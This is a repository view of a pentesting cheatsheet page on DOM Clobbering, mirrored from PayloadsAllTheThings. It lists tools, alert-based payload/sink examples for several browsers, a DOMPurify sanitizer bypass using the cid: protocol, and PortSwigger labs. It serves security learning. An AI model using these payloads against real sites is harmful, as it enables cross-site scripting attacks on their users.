daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (5137B)


      1 ---
      2 title: "DOM Clobbering"
      3 topic: "DOM Clobbering"
      4 topicSlug: "dom-clobbering"
      5 sourcePath: "DOM Clobbering/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/DOM%20Clobbering/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # DOM Clobbering
     12 
     13 > DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities.
     14 
     15 ## Summary
     16 
     17 - [Tools](#tools)
     18 - [Methodology](#methodology)
     19 - [Labs](#labs)
     20 - [References](#references)
     21 
     22 ## Tools
     23 
     24 - [SoheilKhodayari/DOMClobbering](https://domclob.xyz/domc_markups/list) - Comprehensive List of DOM Clobbering Payloads for Mobile and Desktop Web Browsers
     25 - [yeswehack/Dom-Explorer](https://github.com/yeswehack/Dom-Explorer) - A web-based tool designed for testing various HTML parsers and sanitizers.
     26 - [yeswehack/Dom-Explorer Live](https://yeswehack.github.io/Dom-Explorer/dom-explorer#eyJpbnB1dCI6IiIsInBpcGVsaW5lcyI6W3siaWQiOiJ0ZGpvZjYwNSIsIm5hbWUiOiJEb20gVHJlZSIsInBpcGVzIjpbeyJuYW1lIjoiRG9tUGFyc2VyIiwiaWQiOiJhYjU1anN2YyIsImhpZGUiOmZhbHNlLCJza2lwIjpmYWxzZSwib3B0cyI6eyJ0eXBlIjoidGV4dC9odG1sIiwic2VsZWN0b3IiOiJib2R5Iiwib3V0cHV0IjoiaW5uZXJIVE1MIiwiYWRkRG9jdHlwZSI6dHJ1ZX19XX1dfQ==) - Reveal how browsers parse HTML and find mutated XSS vulnerabilities
     27 
     28 ## Methodology
     29 
     30 Exploitation requires any kind of `HTML injection` in the page.
     31 
     32 - Clobbering `x.y.value`
     33 
     34     ```html
     35     // Payload
     36     <form id=x><output id=y>I've been clobbered</output>
     37 
     38     // Sink
     39     <script>alert(x.y.value);</script>
     40     ```
     41 
     42 - Clobbering `x.y` using ID and name attributes together to form a DOM collection
     43 
     44     ```html
     45     // Payload
     46     <a id=x><a id=x name=y href="Clobbered">
     47 
     48     // Sink
     49     <script>alert(x.y)</script>
     50     ```
     51 
     52 - Clobbering `x.y.z` - 3 levels deep
     53 
     54     ```html
     55     // Payload
     56     <form id=x name=y><input id=z></form>
     57     <form id=x></form>
     58 
     59     // Sink
     60     <script>alert(x.y.z)</script>
     61     ```
     62 
     63 - Clobbering `a.b.c.d` - more than 3 levels
     64 
     65     ```html
     66     // Payload
     67     <iframe name=a srcdoc="
     68     <iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>"></iframe>
     69     <style>@import '//portswigger.net';</style>
     70 
     71     // Sink
     72     <script>alert(a.b.c.d)</script>
     73     ```
     74 
     75 - Clobbering `forEach` (Chrome only)
     76 
     77     ```html
     78     // Payload
     79     <form id=x>
     80     <input id=y name=z>
     81     <input id=y>
     82     </form>
     83 
     84     // Sink
     85     <script>x.y.forEach(element=>alert(element))</script>
     86     ```
     87 
     88 - Clobbering `document.getElementById()` using `<html>` or `<body>` tag with the same `id` attribute
     89 
     90     ```html
     91     // Payloads
     92     <html id="cdnDomain">clobbered</html>
     93     <svg><body id=cdnDomain>clobbered</body></svg>
     94 
     95 
     96     // Sink 
     97     <script>
     98     alert(document.getElementById('cdnDomain').innerText);//clobbbered
     99     </script>
    100     ```
    101 
    102 - Clobbering `x.username`
    103 
    104     ```html
    105     // Payload
    106     <a id=x href="ftp:Clobbered-username:Clobbered-Password@a">
    107 
    108     // Sink
    109     <script>
    110     alert(x.username)//Clobbered-username
    111     alert(x.password)//Clobbered-password
    112     </script>
    113     ```
    114 
    115 - Clobbering (Firefox only)
    116 
    117     ```html
    118     // Payload
    119     <base href=a:abc><a id=x href="Firefox<>">
    120 
    121     // Sink
    122     <script>
    123     alert(x)//Firefox<>
    124     </script>
    125     ```
    126 
    127 - Clobbering (Chrome only)
    128 
    129     ```html
    130     // Payload
    131     <base href="a://Clobbered<>"><a id=x name=x><a id=x name=xyz href=123>
    132 
    133     // Sink
    134     <script>
    135     alert(x.xyz)//a://Clobbered<>
    136     </script>
    137     ```
    138 
    139 ## Tricks
    140 
    141 - DomPurify allows the protocol `cid:`, which doesn't encode double quote (`"`): `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`
    142 
    143 ## Labs
    144 
    145 - [PortSwigger - Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering)
    146 - [PortSwigger - Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters)
    147 - [PortSwigger - DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/)
    148 
    149 ## References
    150 
    151 - [Bypassing CSP via DOM clobbering - Gareth Heyes - June 5, 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
    152 - [DOM Clobbering - HackTricks - January 27, 2023](https://web.archive.org/web/20241215205040/https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
    153 - [DOM Clobbering - PortSwigger - September 25, 2020](https://web.archive.org/web/20260218083100/https://portswigger.net/web-security/dom-based/dom-clobbering)
    154 - [DOM Clobbering strikes back - Gareth Heyes - February 6, 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
    155 - [Hijacking service workers via DOM Clobbering - Gareth Heyes - November 29, 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)